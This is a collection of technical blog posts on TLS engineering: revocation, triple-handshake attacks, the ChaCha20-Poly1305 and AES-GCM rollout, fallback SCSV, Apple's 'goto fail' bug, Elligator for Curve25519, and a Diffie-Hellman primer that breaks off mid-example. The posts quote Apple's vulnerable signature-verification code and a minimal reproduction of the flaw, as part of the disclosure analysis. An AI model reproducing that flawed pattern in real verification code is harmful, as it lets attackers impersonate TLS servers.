If we want a scalable solution to the revocation problem then it's probably going to come in the form of short-lived certificates or something like OCSP Must Staple. Recall that the original problem stems from the fact that certificates are valid for years. If they were only valid for days then revocation would take care of itself. (This is the approach taken by DNSSEC.) For complex reasons, it might be easier to deploy that by having certificates that are valid for years, but include a marker in them that indicates that an OCSP response must be provided along with the certificate. The OCSP response is then only valid for a few days and the effect is the same (although less efficient).

TLS Triple Handshakes

Today, the TLS WG mailing list received a note about the work of Karthikeyan Bhargavan, Antoine Delignat-Lavaud, Cedric Fournet, Alfredo Pironti and Pierre-Yves Strub on triple handshake attacks against TLS. This is more complex than just a duplicated goto and I'm not going to try and reproduce their explanation here. Instead, I'll link to their site again, which also includes a copy of their paper.

In short, the TLS handshake hashes in too little information, and always has. Because of that it's possible to synchronise the state of two TLS sessions in a way that breaks assumptions made in the rest of the protocol.

I'd like to thank the researchers for doing a very good job of disclosing this. The note today even included a draft for fixing the TLS key derivation to include all the needed information to stop this attack, and it'll be presented at the WG meeting tomorrow.

In the mean time, people shouldn't panic. The impact of this attack is limited to sites that use TLS client-certificate authentication with renegotiation, and protocols that depend on channel binding. The vast majority of users have never used client certificates.

The client-certificate issues can be fixed with a unilateral, client change to be stricter about verifying certificates during a renegotiation, as suggested by the authors. I've included an image, below, that is loaded over an HTTPS connection that renegotiates with unrelated certificates before returning the image data. Hopefully the image below is broken. If not, then it likely will be soon because of a browser update. (I took the server down.)

Protocols that depend on channel binding (including ChannelID) need other changes. Ideally, the proposed update to the master-secret computation will be finalised and implemented. (For ChannelID, we have already updated the protocol to include a change similar to the proposed draft.)

It's likely that there are still concrete problems to be found because of the channel-binding break. Hopefully with today's greater publicity people can start to find them.

TLS Symmetric Crypto

At this time last year, the TLS world was mostly running on RC4-SHA and AES-CBC. The Lucky 13 attack against CBC in TLS had just been published and I had spent most of January writing patches for OpenSSL and NSS to implement constant-time CBC decoding. The RC4 biases paper is still a couple of weeks away, but it's already clear that both these major TLS cipher suite families are finished and need replacing. (The question of which is worse is complicated.)

Here's Chrome's view of TLS by number of TLS connections from around this time (very minor cipher suite families were omitted):

Cipher suite family    Percentage of TLS connections made by Chrome
RC4-MD5                2.8%
RC4-SHA1               48.9%
AES128-SHA1            1.2%
AES256-SHA1            46.3%

A whole bunch of people, myself included, have been working to address that since.

AES-GCM was already standardised, implemented in OpenSSL and has hardware support in Intel chips, so Wan-Teh Chang and I started to implement it in NSS, although first we had to implement TLS 1.2, on which it depends. That went out in Chrome 30 and 31. Brian Smith (and probably others!) at Mozilla shipped that code in Firefox also, with Firefox 27.

AES-GCM is great if you have hardware support for it: Haswell chips can do it in just about 1 cycle/byte. However, it's very much a hardware orientated algorithm and it's very difficult to implement securely in software with reasonable speed. Also, since TLS has all the infrastructure for cipher suite negotiation already, it's nice to have a backup in the wings should it be needed.

So we implemented ChaCha20-Poly1305 for TLS in NSS and OpenSSL. (Thanks to Elie Bursztein for doing a first pass in OpenSSL.) This is an AEAD made up of primitives from djb and we're using implementations from djb, Andrew M, Ted Krovetz and Peter Schwabe. Although it can't beat AES-GCM when AES-GCM has dedicated hardware, I suspect there will be lots of chips for a long time that don't have such hardware. Certainly most mobile phones at the moment don't (although AArch64 is coming).

Here's an example of the difference in speeds:

Chip                         AES-128-GCM speed    ChaCha20-Poly1305 speed
OMAP 4460                    24.1 MB/s            75.3 MB/s
Snapdragon S4 Pro            41.5 MB/s            130.9 MB/s
Sandy Bridge Xeon (AESNI)    900 MB/s             500 MB/s

(The AES-128-GCM implementation is from OpenSSL 1.0.1f. Note, ChaCha20 is a 256-bit cipher and AES-128 obviously isn't.)

There's also an annoying niggle with AES-GCM in TLS because the spec says that records have an eight byte, explicit nonce. Being an AEAD, the nonce is required to be unique for a given key. Since an eight-byte value is too small to pick at random with a sufficiently low collision probability, the only safe implementation is a counter. But TLS already has a suitable, implicit record sequence counter that has always been used to number records. So the explicit nonce is at best a waste of eight bytes per record, and possibly dangerous should anyone attempt to use random values with it. Thankfully, all the major implementations use a counter and I did a scan of the Alexa, top 200K sites to check that none are using random values - and none are. (Thanks to Dr Henson for pointing out that OpenSSL is using a counter, but with a random starting value.)
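To see why eight random bytes are too few, here is a sketch using the standard birthday approximation. The function name and the record counts are illustrative assumptions, not figures from any implementation.

```python
import math


def collision_probability(num_records: int, nonce_bits: int = 64) -> float:
    """Approximate chance that at least two of num_records random nonces collide.

    Uses the birthday approximation 1 - exp(-n(n-1) / (2 * 2**bits)).
    """
    space = 2.0 ** nonce_bits
    return -math.expm1(-num_records * (num_records - 1) / (2.0 * space))


if __name__ == "__main__":
    for log2_n in (20, 28, 32):
        p = collision_probability(2 ** log2_n)
        print(f"2^{log2_n} records under one key: p = {p:.3g}")
```

By this approximation, a key used for around 2^32 records with random 64-bit nonces has a collision chance of more than one in three, whereas a counter never repeats.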

For ChaCha20-Poly1305 we can save 8 bytes of overhead per record by using the implicit sequence number for the nonce.

Cipher suite selection

Given the relative merits of AES-GCM and ChaCha20-Poly1305, we wish to use the former when hardware support is available and the latter otherwise. But TLS clients typically advertise a fixed preference list of cipher suites and TLS servers either respect it, or override the client's preferences with their own, fixed list. (E.g. Apache's SSLHonorCipherOrder directive.)

So, first, the client needs to alter its cipher suite preference list depending on whether it has AES-GCM hardware support - which Chrome now does. Second, servers that enforce their own preferences (which most large sites do) need a new concept of an equal-preference group: a set of cipher suites in the server's preference order which are all “equally good”. When choosing a cipher suite using the server preferences, the server finds its most preferable cipher suite that the client also supports and, if that is in an equal preference group, picks whichever member of the group is the client's most preferable. For example, Google servers have a cipher suite preference that includes AES-GCM and ChaCha20-Poly1305 cipher suites in an equal preference group at the top of the preference list. So if the client supports any cipher suite in that group, then the server will pick whichever was most preferable for the client.
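The selection rule can be sketched as follows. This is a minimal Python illustration of the idea as described above, not the code that any server runs; the suite names are shortened labels and `choose_cipher_suite` is a hypothetical helper.

```python
from typing import Dict, Optional, Sequence


def choose_cipher_suite(
    server_groups: Sequence[Sequence[str]],
    client_prefs: Sequence[str],
) -> Optional[str]:
    """Pick a cipher suite using server preferences with equal-preference groups.

    server_groups is ordered from most to least preferred; suites within one
    group are considered equally good by the server. client_prefs is the
    client's list, most preferred first.
    """
    client_rank: Dict[str, int] = {}
    for i, suite in enumerate(client_prefs):
        client_rank.setdefault(suite, i)

    for group in server_groups:
        shared = [s for s in group if s in client_rank]
        if shared:
            # Within the group, defer to the client's own ordering.
            return min(shared, key=client_rank.__getitem__)
    return None


if __name__ == "__main__":
    server = [["AES128-GCM", "CHACHA20-POLY1305"], ["AES256-SHA1"], ["RC4-SHA1"]]
    no_aes_hw = ["CHACHA20-POLY1305", "AES128-GCM", "AES256-SHA1"]
    aes_hw = ["AES128-GCM", "CHACHA20-POLY1305", "AES256-SHA1"]
    print(choose_cipher_suite(server, no_aes_hw))
    print(choose_cipher_suite(server, aes_hw))
```

A server with only single-member groups behaves exactly like a traditional fixed preference list, so the group concept is a strict extension of the existing behaviour.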

The end result is that Chrome talking to Google uses AES-GCM if there's hardware support at the client and ChaCha20-Poly1305 otherwise.

After a year of work, let's see what Chrome's view of TLS is now:

Cipher suite family                Percentage of TLS connections made by Chrome
RC4-MD5                            3.1%
RC4-SHA1                           14.1%
AES128-SHA1                        2.6%
AES256-SHA1                        40.2%
AES128-GCM & ChaCha20-Poly1305     39.9%

What remains is standardisation work and getting the code out to the world for others. The ChaCha20-Poly1305 cipher suites are unlikely to survive the IETF without changes so we'll need to respin them at some point. As for getting the code out, I hope to have something to say about that in the coming months. Before then I don't recommend that anyone try to repurpose code from the Chromium repos - it is maintained with only Chromium in mind.

Fallbacks

Now that TLS's symmetric crypto is working better there's another, long-standing problem that needs to be addressed: TLS fallbacks. The new, AEAD cipher suites only work with TLS 1.2, which shouldn't be a problem because TLS has a secure negotiation mechanism. Sadly, browsers have a long history of doing TLS fallbacks: reconnecting with a lesser TLS version when a handshake fails. This is because there are lots of buggy HTTPS servers on the Internet that don't implement version negotiation correctly and fallback allows them to continue to work. (It also promotes buggy implementations by making them appear to function; but fallback was common before Chrome even existed so we didn't really have a choice.)

Chrome now has a four stage fallback: TLS 1.2, 1.1, 1.0 then SSLv3. The problem is that fallback can be triggered by an attacker injecting TCP packets and it reduces the security level of the connection. In the TLS 1.2 to 1.1 fallback, AES-GCM and ChaCha20-Poly1305 are lost. In the TLS 1.0 to SSLv3 fallback, all elliptic curve support, and thus ECDHE, disappears. If we're going to depend on these new cipher suites then we cannot allow attackers to do this, but we also cannot break all the buggy servers.

So, with Chrome 33, we implemented a fallback SCSV. This involves adding a pseudo-cipher suite in the client's handshake that indicates when the client is trying a fallback connection. If an updated server sees this pseudo-cipher suite, and the connection is not using the highest TLS version supported by the server, then it replies with an error. This is essentially duplicating the version negotiation in the cipher suite list, which isn't pretty, but the reality is that the cipher suite list still works but the primary version negotiation is rusted over with bugs.
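The server-side check is small enough to sketch. The constants below are the ones that RFC 7507 later assigned to this mechanism; that Chrome 33 used exactly these values is my assumption here, and the function name and argument layout are invented for the example.

```python
TLS_FALLBACK_SCSV = 0x5600       # pseudo-cipher suite value from RFC 7507
INAPPROPRIATE_FALLBACK = 86      # alert number from RFC 7507

SSL3, TLS1_0, TLS1_1, TLS1_2 = 0x0300, 0x0301, 0x0302, 0x0303


def check_fallback(client_version, client_cipher_suites, server_max_version):
    """Return an alert number if the handshake should be rejected, else None.

    The client adds the SCSV only when it is retrying with a lower version.
    If the server could have spoken something higher, the fallback was not
    needed, so something (possibly an attacker) forced it.
    """
    if TLS_FALLBACK_SCSV in client_cipher_suites and client_version < server_max_version:
        return INAPPROPRIATE_FALLBACK
    return None


if __name__ == "__main__":
    suites = [0xC02F, 0x0005, TLS_FALLBACK_SCSV]
    print(check_fallback(TLS1_1, suites, TLS1_2))  # rejected
    print(check_fallback(TLS1_2, suites, TLS1_2))  # allowed
```

A server that genuinely tops out at the version the client fell back to never triggers the check, so buggy-but-honest servers keep working.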

With this in place (and also implemented on Google servers) we can actually depend on having TLS 1.2, at least between Chrome and Google (for now).

Bugs

Few rollouts are trouble free and Chrome 33 certainly wasn't, although most of the problems were because of a completely different change.

Firstly, ChaCha20-Poly1305 is running at reduced speed on ARM because early-revision, S3 phones have a problem that causes the NEON, Poly1305 code to sometimes calculate the wrong result. (It's not clear if it's the MSM8960 chip or the power supply in the phone.) Of course, it works well enough to run the unit tests successfully because otherwise I wouldn't have needed two solid days to pin it down. Future releases will need to run a self-test to gather data about which revisions have the problem and then we can selectively disable the fast-path code on those devices. Until then, it's disabled everywhere. (Even so, ChaCha20-Poly1305 is still much faster than AES-GCM on ARM.)

But it was the F5 workaround that caused most of the headaches. Older (but common) firmware revisions of F5 devices hang the connection when the ClientHello is longer than 255 bytes. This appeared to be a major issue because it meant that we couldn't add things to the ClientHello without breaking lots of big sites that use F5 devices. After a plea and a discussion on the TLS list, an engineer from F5 explained that it was just handshake messages between 256 and 511 bytes in length that caused the issue. That suggested an obvious solution: pad the handshake message so that it doesn't fall into the troublesome size range.
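As a sketch of the arithmetic only: given the length of a handshake message, how many bytes of padding would move it out of the 256 to 511 byte range? The function name is hypothetical, and this ignores how the padding is actually carried in the ClientHello (an extension has its own header bytes, which a real implementation has to account for).

```python
TROUBLE_MIN = 256  # shortest handshake message that hangs the old firmware
TROUBLE_MAX = 511  # longest one that does


def padding_needed(handshake_length: int) -> int:
    """Bytes to add so that the message is not 256..511 bytes long."""
    if TROUBLE_MIN <= handshake_length <= TROUBLE_MAX:
        return (TROUBLE_MAX + 1) - handshake_length
    return 0


if __name__ == "__main__":
    for length in (200, 256, 300, 511, 512):
        print(length, "->", length + padding_needed(length))
```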

Chrome 33 padded all ClientHellos to 512 bytes, which broke at least two “anti-virus” products that perform local MITM of TLS connections on Windows and at least one “filtering” device that doesn't do MITM, but killed the TCP connections anyway. All made the assumption that the ClientHello will never be longer than some tiny amount. In the firewall case, the fallback SCSV stopped a fallback to SSLv3 that would otherwise have hidden the problem by removing the padding.

Thankfully, two of the three vendors have acted quickly to address the issue. The last, Kaspersky, has known about these sorts of problems for 18 months now (since Chrome tried to deploy TLS 1.1 and hit a similar issue) but, thankfully, doesn't enable MITM mode by default.

Overall, it looks like the changes are viable. Hopefully the path will now be easier for any other clients that wish to do the same.

Apple's SSL/TLS bug

Yesterday, Apple pushed a rather spooky security update for iOS that suggested that something was horribly wrong with SSL/TLS in iOS but gave no details. Since the answer is at the top of the Hacker News thread, I guess the cat's out of the bag already and we're into the misinformation-quashing stage now.

So here's the Apple bug:

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
	OSStatus        err;
	...

	if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
		goto fail;
	if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
		goto fail;
		goto fail;
	if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
		goto fail;
	...

fail:
	SSLFreeBuffer(&signedHashes);
	SSLFreeBuffer(&hashCtx);
	return err;
}

(Quoted from Apple's published source code.)

Note the two goto fail lines in a row. The first one is correctly bound to the if statement but the second, despite the indentation, isn't conditional at all. The code will always jump to the end from that second goto, err will contain a successful value because the SHA1 update operation was successful and so the signature verification will never fail.

This signature verification is checking the signature in a ServerKeyExchange message. This is used in DHE and ECDHE ciphersuites to communicate the ephemeral key for the connection. The server is saying “here's the ephemeral key and here's a signature, from my certificate, so you know that it's from me”. Now, if the link between the ephemeral key and the certificate chain is broken, then everything falls apart. It's possible to send a correct certificate chain to the client, but sign the handshake with the wrong private key, or not sign it at all! There's no proof that the server possesses the private key matching the public key in its certificate.

Since this is in SecureTransport, it affects iOS from some point prior to 7.0.6 (I confirmed on 7.0.4) and also OS X prior to 10.9.2 (confirmed on 10.9.1). It affects anything that uses SecureTransport, which is most software on those platforms although not Chrome and Firefox, which both use NSS for SSL/TLS. However, that doesn't mean very much if, say, the software update systems on your machine might be using SecureTransport.

I coded up a very quick test site at https://www.imperialviolet.org:1266. Note the port number (which is the CVE number), the normal site is running on port 443 and that is expected to work. On port 1266 the server is sending the same certificates but signing with a completely different key. If you can load an HTTPS site on port 1266 then you have this bug.

Because the certificate chain is correct and it's the link from the handshake to that chain which is broken, I don't believe any sort of certificate pinning would have stopped this. Also, this doesn't only affect sites using DHE or ECDHE ciphersuites - the attacker gets to choose the ciphersuite in this case and will choose the one that works for them.

Also, this doesn't affect TLS 1.2 because there's a different function for verifying the different ServerKeyExchange message in TLS 1.2. But, again, the attacker can choose any version that the client will accept. But if the client only enables TLS 1.2 then it appears that would work around this issue. Likewise, if the client only enabled the plain, RSA ciphersuites then there's no ServerKeyExchange and that should also work around this issue. (Of the two, the former workaround is much preferable.)

Based on my test site, both iOS 7.0.6 and OS X 10.9.2 fix the issue. (Update: it looks like the bug was introduced in 10.9 for OS X but existed in at least some versions of iOS 6. iOS 6.1.6 was released yesterday to fix it.)

This sort of subtle bug deep in the code is a nightmare. I believe that it's just a mistake and I feel very bad for whoever might have slipped in an editor and created it.

Here's a stripped-down version of that code with the same issue:

extern int f();

int g() {
	int ret = 1;

	goto out;
	ret = f();

out:
	return ret;
}

If I compile with -Wall (enable all warnings), neither GCC 4.8.2 nor Clang 3.3 from Xcode makes a peep about the dead code. That's surprising to me. A better warning could have stopped this but perhaps the false positive rate is too high over real codebases? (Thanks to Peter Nelson for pointing out that Clang does have -Wunreachable-code to warn about this, but it's not in -Wall.)

Maybe the coding style contributed to this by allowing ifs without braces, but one can have incorrect indentation with braces too, so that doesn't seem terribly convincing to me.

A test case could have caught this, but it's difficult because it's so deep into the handshake. One needs to write a completely separate TLS stack, with lots of options for sending invalid handshakes. In Chromium we have a patched version of TLSLite to do this sort of thing but I cannot recall that we have a test case for exactly this. (Sounds like I know what my Monday morning involves if not.)

Code review can be effective against these sorts of bug. Not just auditing, but review of each change as it goes in. I've no idea what the code review culture is like at Apple but I strongly believe that my colleagues, Wan-Teh or Ryan Sleevi, would have caught it had I slipped up like this. Although not everyone can be blessed with folks like them.

Lastly, there was a lot of discussion yesterday that Apple missed checking the hostname in the certificate. It's true that curl on the OS X command line oddly accepts HTTPS connections to IP addresses when the IP address isn't in the certificate, but I can't find that there's anything more than that and Safari doesn't have that problem.

Implementing Elligator for Curve25519

There are some situations where you would like to encode a point on an elliptic curve in such a way that it appears to be a uniform, random string. This comes up in some password authenticated key exchange systems, where one doesn't want to leak any bits of the password. It also comes up in protocols that are trying to be completely uniform so as to make life hard for network censors.

For the purposes of this post, I'm only going to be considering Curve25519. Recall that Curve25519 is the set of points (u,v) where v^2 = u^3 + 486662u^2 + u and u and v are taken from GF(q = 2^255 - 19). Curve25519 works with a Montgomery ladder construction and thus only exchanges u coordinates. So, when sending a u coordinate there are two ways that an attacker can distinguish it from a random string:

Firstly, since the field is only 255 bits, the 256th bit is always zero. Thus if an attacker sees a series of 32-byte strings where the top bit of the last byte is always zero, then they can be confident that they are not random strings. This is easy to fix, however: just XOR in a random bit and mask it out before processing.

Secondly, the attacker can assume that a 32-byte string is a u coordinate and check whether u^3 + 486662u^2 + u is a square. This will always be true if the strings are u coordinates, by the curve equation, but will only be true 50% of the time otherwise. This problem is a lot harder to fix.
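Both distinguishers, and the easy fix for the first one, can be sketched in Python. This is an illustration under my own naming, not code from any implementation: the "wire" value is assumed to be the usual 32-byte, little-endian encoding of the coordinate that appears cubed in the curve equation, and the square test is Euler's criterion.

```python
import secrets

Q = 2**255 - 19   # field size
A = 486662        # Curve25519 parameter


def is_square(a: int) -> bool:
    """Euler's criterion: a is a square iff a^((q-1)/2) is 1 (or a is zero)."""
    a %= Q
    return a == 0 or pow(a, (Q - 1) // 2, Q) == 1


def could_be_curve_coordinate(wire: bytes) -> bool:
    """The attacker's second test: is the curve equation's right-hand side a square?"""
    u = int.from_bytes(wire, "little") & ((1 << 255) - 1)
    return is_square(u**3 + A * u**2 + u)


def randomise_top_bit(encoded: bytes) -> bytes:
    """Fix for the first test: fill the unused 256th bit with a random bit."""
    if len(encoded) != 32 or encoded[31] & 0x80:
        raise ValueError("expected a 32-byte value with the top bit clear")
    return encoded[:31] + bytes([encoded[31] | (secrets.randbelow(2) << 7)])


def clear_top_bit(wire: bytes) -> bytes:
    """Receiver side: mask the random bit out again before processing."""
    return wire[:31] + bytes([wire[31] & 0x7F])


if __name__ == "__main__":
    base_point = (9).to_bytes(32, "little")
    print(could_be_curve_coordinate(base_point))
    hits = sum(could_be_curve_coordinate(secrets.token_bytes(32)) for _ in range(1000))
    print(hits, "of 1000 random strings pass the square test")
```

Random strings should pass the square test about half the time, so a handful of observed values is enough for an attacker to tell the two cases apart.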

Thankfully, djb, Tanja Lange, Mike Hamburg and Anna Krasnova have published Elligator [paper]. In that paper they present two maps from elliptic curve points to uniform, random strings and you should, at least, read the introduction to the paper, which contains much more detail on the use cases and previous work.

Elligator 2 is suitable for Curve25519 and there are some hints about an implementation in section 5.5. However, this blog post contains my own notes about implementing each direction of the map with only a couple of exponentiations. You may need to read the paper first before the following makes much sense.

I'll start with the inverse map, because that's what's used during key-generation. Throughout I'll write (x, y) for affine coordinates on the twisted, Edwards isomorphism of Curve25519, as defined for Ed25519; (u,v) for affine coordinates on Curve25519 itself; and X, Y, Z for extended coordinates on the twisted, Edwards curve.

The inverse map, ψ^{-1}, takes a point on the curve with the following limitations and produces a uniform, representative value:

  1. u ≠ -A. (The value A is a parameter of Curve25519 and has the value 486662.)
  2. -2u(u + A) is a square

Since we're generating the points randomly, I'm going to ignore the first condition because it happens far less frequently than malfunctions in the CPU instructions that I might use to detect it.

The second condition excludes about half the points on the curve: these points don't have any representation as a uniform string. When generating a key we need to detect and restart if we happen upon one of those points. (When working in the other direction, ψ(r) = ψ(-r), which explains why half the image is missing.)

If the point is in the image of the map then the uniform string representation, r, is defined by:

(If you can't see the equation, you need a browser that can handle inline SVG.)
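In case the equation is not visible, here is what it presumably says. This is a reconstruction, assuming the Elligator 2 definition from the paper with 2 as the non-square; the two radicands agree with the square roots discussed in the rest of this post, but the exact form of the condition on v is my reading of the paper rather than something stated here.

```latex
r =
\begin{cases}
\sqrt{\dfrac{-u}{2(u+A)}} & \text{if } v \le (q-1)/2 \\[2ex]
\sqrt{\dfrac{-(u+A)}{2u}} & \text{otherwise}
\end{cases}
```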

So our key generation function is going to take a private key and either produce nothing (if the resulting point isn't in the image of the map), or produce a public key and the uniform representation of it. We're working with Curve25519, so the public key, if any, will exactly match the result of the scalar_base_mult operation on Curve25519.

Since I happened to have the ref10 code from Ed25519 close to hand, we'll be calculating the scalar multiplication on the twisted, Edwards isomorphism of Curve25519 that Ed25519 uses. I've discussed that before but, in short, it allows for the use of precomputed tables and so is faster than scalar_base_mult with the Curve25519 code.

The result of the scalar multiplication of the base point with the private key is a point on the twisted, Edwards curve in extended coordinates: (X : Y : Z), where x = X/Z and y = Y/Z and where (x, y) are the affine coordinates on the Edwards curve. In order to convert a point on the Edwards curve to a point on Curve25519, we evaluate:

This is looking quite expensive: first we have to convert from extended coordinates on the Edwards curve to affine, then to affine on Curve25519. In finite fields, inversions (i.e. division) are very expensive because they are done by raising the divisor to the power of q-2 (where q = 2^255 - 19). Compared to such large exponentiations, multiplications and additions are almost free.

But, we can merge all those inversions and do the whole conversion with just one. First, substitute the extended coordinate conversion: x = X/Z, y = Y/Z.

By calculating just 1/(X(Y-Z)), we can get (u,v). The reciprocal can be used directly to calculate v and then multiplied by X to calculate u.
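Written out, the conversion and the merged form look something like the following. This uses the standard map between the Ed25519 curve and Curve25519 as given in RFC 7748, so the choice of sign for the square root of -486664 is an assumption, and w is just a name introduced here for the single reciprocal.

```latex
\begin{aligned}
w &= \frac{1}{X\,(Y-Z)} \\
u &= \frac{1+y}{1-y} = \frac{Z+Y}{Z-Y} = -X\,(Y+Z)\,w \\
v &= \sqrt{-486664}\;\frac{u}{x} = \sqrt{-486664}\;\frac{Z\,(Z+Y)}{X\,(Z-Y)} = -\sqrt{-486664}\;Z\,(Y+Z)\,w
\end{aligned}
```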

What remains is to check whether -2u(u + A) is a square and then to calculate the correct square root. Happily, we can calculate all that (including both square roots because we want to be constant-time), with a single exponentiation.

Square roots are defined in the standard way for finite fields where q ≡ 5 mod 8:

Let's consider the square roots first. Both have a common, constant term of (-1/2) which we can ignore for now. With that gone, both are fractions that we need to raise to (q+3)/8. Section 5 of the Ed25519 paper contains a trick for merging the inversion with the exponentiation:

But let's see what else we can do with the c value.

So c^7 gives us the variable part of the other square root without another large exponentiation! It only remains to multiply in the constant term of (-1/2)^{(q+3)/8} to each and then, for each, test whether the square root of -1 needs to be multiplied. For the first square root, for example, we should have that r^2 = -u/(2(u+A)) thus 2r^2(u+A)+u should be zero. If not, then we need to multiply r by sqrt(-1).

Lastly, we need to check that the point is in the image of the map at all! (An implementation may want to do this sooner so that failures can be rejected faster.) For this we need to check that -2u(u + A) is a square. We use the fact that an element of the field is a non-zero square iff raising it to (q-1)/2 results in one. Thus we need to calculate (-2)^{(q-1)/2} (u(u+A))^{(q-1)/2}. The first part is just a constant, but the latter would be an expensive, large exponentiation, if not for c again:

With that result we can pick the correct square root (and in constant time, of course!)

The map in the forward direction

In the forward direction, the map takes a uniform, representative value and produces a public key, which is the u coordinate of a Curve25519 point in this context: ψ(r) = u. (Remember that the affine coordinates on Curve25519 are written (u,v) here.) This is much simpler than the reverse direction, although, as best I can tell, equally expensive. Given a value, r, one can calculate the value u with:

This requires one inversion to calculate d and another, large exponentiation to calculate ε. The resulting u value will match the output of the key generation stage which, in turn, matches the value that running scalar_base_mult from the Curve25519 code would have produced for the same private key.
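To make both directions concrete, here is a deliberately naive Python sketch. It is not constant-time, it uses separate exponentiations rather than the merged ones described above, and it is not a port of the Go code. The formulas are my reading of Elligator 2 with 2 as the non-square: d = -A/(1+2r^2), ε = (d^3 + Ad^2 + d)^((q-1)/2), and u is d when ε is 1 and -d-A otherwise. All function names are made up for the example.

```python
Q = 2**255 - 19                     # field size
A = 486662                          # Curve25519 parameter
SQRT_M1 = pow(2, (Q - 1) // 4, Q)   # a square root of -1 (2 is a non-square)


def is_square(a):
    """Euler's criterion; zero counts as a square."""
    a %= Q
    return a == 0 or pow(a, (Q - 1) // 2, Q) == 1


def inv(a):
    """Inversion by raising to the power q-2."""
    return pow(a, Q - 2, Q)


def sqrt(a):
    """Square root for q = 5 mod 8, returning the root in 0..(q-1)/2."""
    a %= Q
    x = pow(a, (Q + 3) // 8, Q)
    if x * x % Q != a:
        x = x * SQRT_M1 % Q
    if x * x % Q != a:
        raise ValueError("not a square")
    return min(x, Q - x)


def inverse_map(u, v_is_negative):
    """Representative for a curve point, or None if it is outside the image.

    v_is_negative means v > (q-1)/2 and selects which square root is used.
    """
    if not is_square(-2 * u * (u + A)):
        return None
    if v_is_negative:
        return sqrt(-(u + A) * inv(2 * u))
    return sqrt(-u * inv(2 * (u + A)))


def forward_map(r):
    """Map a representative back to the u coordinate."""
    d = -A * inv(1 + 2 * r * r) % Q
    eps = pow(d**3 + A * d * d + d, (Q - 1) // 2, Q)  # 1 or q-1 (i.e. -1)
    return d if eps == 1 else (-d - A) % Q


if __name__ == "__main__":
    for u in range(1, 50):
        if is_square(u**3 + A * u * u + u):          # u is on the curve
            r = inverse_map(u, v_is_negative=False)
            if r is not None:
                print(u, forward_map(r) == u, forward_map(Q - r) == u)
```

The last column shows the property that causes trouble later: r and -r map to the same point.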

Note that the Elligator software page says that GMP can compute the Legendre symbol (the ε calculation) in only 9000 cycles, so I'm clearly missing some implementation trick somewhere. Additionally, the Elligator paper raises the possibility of implementing the inversions with a blinded, Euclidean algorithm. That would certainly be faster but I'm not comfortable that I know how to do that safely, so I'm sticking with exponentiation here.

Implementation

I've a constant-time, pure Go implementation, based on the field operations from the pure-C, SUPERCOP, Ed25519 code. The field operations have been ported pretty mechanically from the C code, so it's hardly pretty Go code, but it seems to work.

On my, 3.1GHz, Ivy Bridge system (with TurboBoost enabled) the key generation takes 155µs and the forward map operation takes 28µs. (But remember that half of the key generations will fail, so ~double that time.)

I have not carefully reviewed the code, so beware. There are also some non-obvious concerns when using Elligator: for example, if you are hiding a uniform representative in a nonce field then the attacker might assume that it's a field element, negate it and let the connection continue. In a normal protocol, altering the nonce usually leads to a handshake failure but negating an Elligator representative is a no-op. If the connection continues then the attacker can be pretty sure that the value wasn't really random. So care is required.

So if you think that Elligator might be right for you, consult your cryptographer.

Forward security for journalists

A number of journalists have been writing stories about forward security recently. Some of them ended up talking to me and I completely failed to come up with a good metaphor that didn't cause more problems than it solved. Eventually I wrote the following as an introduction to forward security for journalists. It's deeply simplified but I think it captures the broad strokes.

It remains unclear whether anyone actually came away with a better understanding after reading it, however.

A great many metaphors have been mangled, and analogies tortured, trying to explain what forward security is. But, fundamentally, it doesn't involve anything more complex than high-school math and anybody should be able to understand it. So this document attempts to describe what forward security is.

In the 1970s, cryptography was purely the concern of the military. The NSA existed (unofficially) and believed that it was the sole, legitimate center of cryptographic knowledge in the US. In this environment, Whitfield Diffie set out from MIT across the country to try and gather up what scraps of cryptography had escaped into the public realm. If we omit huge amounts of detail (see Steven Levy's book, “Crypto” for the details) we can say that he ended up at Stanford with a revolutionary idea in his head: public key cryptography.

Up to that point, cryptography had involved secret keys that both the sender and receiver were in possession of. Diffie wondered about a system where one could publish part of a key (the public part) and keep another part of the key private. However, he didn't have any concrete implementation of this.

At Stanford he found Martin Hellman and together they published New Directions in Cryptography (1976), which contained the Diffie-Hellman key-agreement algorithm. This is possibly the most significant work in cryptographic history and is still a core algorithm today. (Later we learnt that a researcher at GCHQ had discovered the idea a few years earlier. But GCHQ didn't do anything with it and never published it.)

We'll need modular arithmetic, which is like working with times. What's 8pm plus five hours? One o'clock. Because 8+5=13 and 13 divided by 12 has a remainder of one. Likewise, 8pm plus 17 hours is still one o'clock, because adding multiples of 12 doesn't make any difference to a clock. We'll be using the same idea, but with numbers (called the modulus) other than 12.

To explain Diffie-Hellman we'll work modulo 11. So 5+10=4 now, because 15 divided by 11 has a remainder of 4.

Next, exponentiation: 2^3 means 2, multiplied by itself three times. So 2^3 = 2×2×2 = 8. Now we have everything that we need to implement Diffie-Hellman.

In classic, cryptographic tradition we'll imagine two parties and we'll call them Alice and Bob. Alice generates a random number between 1 and 9 and calls it a. This is her private key; let's say that it's five. Alice calculates her public key as A = 2^a = 2^5 = 32 = 10 mod 11.

Bob does the same but his private key is called b and his public key is B. Let's say that his private key is six which means that B = 2^b = 2^6 = 64 = 9 mod 11.

Alice and Bob can freely publish A and B because, given them, no other party can work backwards and calculate their private keys. Well, in this case they can because we're using a toy example with a tiny modulus. A real modulus has over 500 digits. Then it's not possible with any current computer.

Once Alice has Bob's public key, or vice-versa, she can perform key-agreement. She combines her private key with Bob's public key like this: B^a = 9^5 = 59049 = 1 mod 11. Bob can combine his private key with Alice's public key in the same way: A^b = 10^6 = 1000000 = 1 mod 11. Both Alice and Bob arrived at the same, shared value (one) which nobody else can calculate. And without exchanging any secret information!
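If you'd like to check the arithmetic, the whole toy exchange fits in a few lines of Python. The names are mine; Python's built-in pow(base, exponent, modulus) does the modular exponentiation. The last function shows why the toy modulus is no good: with only ten possibilities, anyone can try them all.

```python
MODULUS = 11
BASE = 2


def public_key(private: int) -> int:
    """Public key is BASE raised to the private key, modulo MODULUS."""
    return pow(BASE, private, MODULUS)


def shared_secret(their_public: int, my_private: int) -> int:
    """Combine the other party's public key with our own private key."""
    return pow(their_public, my_private, MODULUS)


def brute_force_private(public: int) -> int:
    """Only feasible because the modulus is tiny: try every private key."""
    for candidate in range(1, MODULUS):
        if public_key(candidate) == public:
            return candidate
    raise ValueError("no private key found")


if __name__ == "__main__":
    alice_private, bob_private = 5, 6
    alice_public = public_key(alice_private)
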